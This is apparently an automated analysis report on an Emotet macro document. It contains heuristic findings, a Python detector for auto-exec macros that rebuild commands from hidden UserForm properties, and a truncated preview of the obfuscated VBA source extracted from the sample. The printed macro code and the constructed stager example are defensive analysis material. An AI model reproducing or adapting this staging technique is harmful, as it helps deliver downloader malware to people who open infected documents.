Verdict: MALICIOUS (risk score 262)
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1140 Deobfuscate/Decode Files or Information
The sample contains VBA macros, including a Document_Open handler, the auto-execution entry point Emotet maldocs commonly use. The heuristics indicate a hidden UserForm command stager: the auto-exec macro reassembles command text from UserForm properties and hands it to a COM object created via CreateObject, the shape of a downloader that fetches and runs a second-stage payload. The extracted source bears this out: Document_open is padded with junk Select Case arithmetic (Cos, Atn, CDate, Log on constants and uninitialized variables) before calling Jfxlnrsficzmx, and Yfjjffbgeayj concatenates the TextBox control Jtqppansht.Aeeukravytz with Twhafhefmvv properties including Pbgflrvoug.ControlTipText. The ClamAV signature Doc.Downloader.Emotet-7451162-0 corroborates the Emotet attribution.
Heuristics (7)
- ClamAV: Doc.Downloader.Emotet-7451162-0 (critical) CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Downloader.Emotet-7451162-0
- VBA macros detected (medium, 4 related findings) OLE_VBA_MACROS: Document contains VBA macro code
- VBA UserForm hidden-property command stager (critical) OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER: VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
- Document_Open macro (high) OLE_VBA_DOCOPEN: Document_Open macro
- CreateObject call (high) OLE_VBA_CREATEOBJ: CreateObject call
- VBA p-code auto-exec with execution tokens (high) OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL (info) EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the DrawingML schema namespace that Office itself writes into document parts, so it is expected content rather than a contacted host; any download location is assembled at run time from the UserForm properties the macro reads and is not visible to static URL extraction.
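The three macro heuristics above (OLE_VBA_DOCOPEN, OLE_VBA_CREATEOBJ and the OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER shape) reduce to a co-occurrence check over decoded VBA source. The Python below is an added example, not the analyzer's own rule code: it runs that check over two constructed macros, one modelled on the staging pattern the stager rule describes (HiddenForm and Box1 are hypothetical UserForm and control names) and one benign Document_Open handler, so the critical rule fires only when auto-exec, CreateObject and Split/Join over hidden UserForm properties all appear together.

```python
"""Shape check for the macro-downloader heuristics listed above.

Added example, not the analyzer's own rule code. It scans decoded VBA
source for the three legs the stager rule describes: an auto-exec entry
point, a CreateObject call, and command text rebuilt with Split/Join from
rarely used UserForm properties (ControlTipText, Tag, Pages, HelpContextId).
"""
import re
from dataclasses import dataclass

# Office auto-exec entry points that run without user interaction.
AUTOEXEC_RE = re.compile(
    r"^\s*(?:Private\s+|Public\s+)?Sub\s+"
    r"(Document_Open|Document_Close|AutoOpen|AutoClose|AutoExec|"
    r"Auto_Open|Workbook_Open)\s*\(",
    re.IGNORECASE | re.MULTILINE,
)
CREATEOBJECT_RE = re.compile(r"\bCreateObject\s*\(", re.IGNORECASE)
# UserForm/control properties abused as string storage for the command.
HIDDEN_PROP_RE = re.compile(
    r"\.(ControlTipText|Tag|Pages|HelpContextId)\b", re.IGNORECASE
)
SPLIT_JOIN_RE = re.compile(r"\b(Split|Join)\s*\(", re.IGNORECASE)


@dataclass
class Finding:
    rule: str      # rule ID as shown in the heuristics list
    severity: str
    detail: str


def scan_vba_source(src: str) -> list[Finding]:
    """Return the heuristics that fire on one set of decoded VBA modules."""
    findings: list[Finding] = []
    autoexec = AUTOEXEC_RE.search(src)
    has_createobject = CREATEOBJECT_RE.search(src) is not None
    hidden_props = sorted(
        {m.group(1) for m in HIDDEN_PROP_RE.finditer(src)}, key=str.lower
    )
    has_split_join = SPLIT_JOIN_RE.search(src) is not None

    if autoexec and autoexec.group(1).lower() == "document_open":
        findings.append(Finding("OLE_VBA_DOCOPEN", "high", "Document_Open macro"))
    if has_createobject:
        findings.append(Finding("OLE_VBA_CREATEOBJ", "high", "CreateObject call"))
    # The stager rule needs all legs at once; any one alone is common in
    # legitimate macros and would make the rule noisy.
    if autoexec and has_createobject and hidden_props and has_split_join:
        findings.append(Finding(
            "OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER", "critical",
            "%s + CreateObject + Split/Join over %s"
            % (autoexec.group(1), "/".join(hidden_props)),
        ))
    return findings


def rule_ids(src: str) -> list[str]:
    """Rule IDs only, in a fixed order, for quick comparison."""
    return [f.rule for f in scan_vba_source(src)]


# Constructed macro modelled on the staging shape described above, not the
# sample itself. HiddenForm and Box1 are hypothetical UserForm/control names.
STAGER_SAMPLE = """Private Sub Document_open()
    Dim Pieces, Cmd, Obj
    Pieces = Split(HiddenForm.Box1.ControlTipText, "|")
    Cmd = Join(Pieces, "") + HiddenForm.Tag
    Set Obj = CreateObject(HiddenForm.Box1.Tag)
    Obj.Run Cmd, 0
End Sub
"""

# Constructed benign macro: auto-exec entry point, but no object creation
# and no string staging, so only OLE_VBA_DOCOPEN should fire.
BENIGN_SAMPLE = """Private Sub Document_Open()
    ActiveDocument.Fields.Update
End Sub
"""

if __name__ == "__main__":
    for label, src in (("stager", STAGER_SAMPLE), ("benign", BENIGN_SAMPLE)):
        for f in scan_vba_source(src):
            print(f"{label}: {f.rule} [{f.severity}] {f.detail}")
```

This covers decoded source only. The p-code rule in the list (OLE_VBA_PCODE_AUTOEXEC_EXEC) inspects the compiled VBA stream for the cases where source extraction fails, which a regex over text cannot reproduce, so the two channels complement each other rather than overlap.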
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8309 bytes | 322fc26dc9839f96c8d2604638961df4d0a9d0e570591190a62f2f81d2d9cf9d |
Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "Jtqppansht"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "Aeeukravytz, 0, 0, MSForms, TextBox"
Private Sub Document_open()
Select Case Jpjmzyxc
Case 19
Pwcaqrvfssu = Cos(439)
Eggqzccgk = Atn(886)
Qikzaarwxn = Cos(808)
Case 629
Gotjwqmn = Atn(185)
Hffshxzbieur = 136
Gverbytuq = CDate(107)
Case 77
Cgsfpyod = CInt(777)
Fuhttwwf = Log(Pflcbmvmj)
Pzsfrhvsgfn = Bbwyhbwoh
End Select
Select Case Fgblbxggocdkx
Case 415
Mncebatc = Cos(611)
Dtxprsexlzy = Atn(414)
Xbrbulmhmgyjr = Cos(353)
Case 476
Xwlebyydirwjy = Atn(873)
Fbpqedkyzr = 555
Rmygzwgao = CDate(330)
Case 613
Wzzxikybouab = CInt(236)
Bqvmxmmntgrj = Log(Msnxrgsqffboa)
Kqlblygknrbii = Gyzcowhdjrbk
End Select
Select Case Ravrltxclz
Case 800
Clmrvgvbx = Cos(245)
Xhwxmibjaw = Atn(57)
Kduczwlkqolpc = Cos(36)
Case 760
Zhfolioxko = Atn(739)
Ujqrjwpboa = 470
Flzuivhuawbb = CDate(69)
Case 39
Unvfkndlr = CInt(709)
Xctmjxze = Log(Aiupphbkxh)
Bbbgiqpsutyul = Iqycxlzuebq
End Select
Jfxlnrsficzmx
End Sub
Attribute VB_Name = "Twhafhefmvv"
Attribute VB_Base = "0{1BAF1910-618A-4420-9084-64F0B573C63C}{FE794E19-339A-4D90-8956-27C2E008CA72}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Lkoibvaurl"
Function Yfjjffbgeayj()
Select Case Dfwwimgr
Case 853
Tjiolfctqhp = Cos(502)
Unlbccmchtlu = Atn(872)
Jriaofdkpnr = Cos(915)
Case 615
Fvaknuncj = Atn(319)
Dozolqxtso = 526
Hhbdojxy = CDate(306)
Case 824
Whhhiyzeozvyw = CInt(707)
Pzzqxnqmt = Log(Mrzsmyag)
Hehyuoatgjkb = Kximjgunofmhe
End Select
Vnivkcoxgms = Jtqppansht.Aeeukravytz
Select Case Cwtcjols
Case 894
Qyiqkbuu = Cos(109)
Ggbtwvcur = Atn(2)
Czvvvsgkvnkps = Cos(39)
Case 36
Byaylvuvuvuz = Atn(440)
Mqbngnzmvoi = 197
Tuwqjoctdu = CDate(481)
Case 938
Aidazasawiwjb = CInt(112)
Updlpwlabyfl = Log(Tiviqgev)
Opnnkxmoxxiea = Apibctpi
End Select
Pekavoiyqhro = Vnivkcoxgms + Twhafhefmvv.Yuqvxxmhhy + Twhafhefmvv.Nvylwcphvjgew + Twhafhefmvv.Zbvcmpsrvzof
Select Case Xnnxshphevfin
Case 405
Xenprpgrqz = Cos(524)
Vwplhagbefq = Atn(51)
Jfqhffam = Cos(232)
Case 233
Vqhbjrvx = Atn(357)
Tukpjyihmir = 318
Phjpkluc = CDate(473)
Case 303
Vtuzywjii = CInt(916)
Gpvbygwsagjho = Log(Ablldmsnpvoy)
Czjveisonm = Jaammghdwixwp
End Select
Fyeltbcyzeyah = Pekavoiyqhro + Twhafhefmvv.Pwlrpnrmnwl + Twhafhefmvv.Pbgflrvoug.ControlTipText
Select Case Wwmzdfkcf
Case 249
Zpzvgiqgoa = Cos(276)
Hgumpowapdz = Atn(379)
Dphyvuforp = Cos(86)
Case 989
Lflowkergeti = Atn(596)
Niftvqimdtii = 903
Aaqqqueil = CDate(691)
Case 740
Svzcywzfagwj = CInt(27)
Ojzbsforxqfn = Log(Yqewtacuikex)
Tzdrsvbl = Tfebxiwks
End Select
Yfjjffbgeayj = Whmqyuaztu + Fyeltbcyzeyah + Whmqyuaztu
Select Case Hhpdpxmwnhh
Case 433
Rrxxuxxt = Cos(614)
Gndjbkhrvsffx = Atn(431)
Hbrkrkfjiaqdw = Cos(253)
Case 132
Mwjjjqlollf = Atn(257)
Zxltixmvgj = 80
Aeuilhlyffi = CDate(103)
Case 668
```

... (truncated)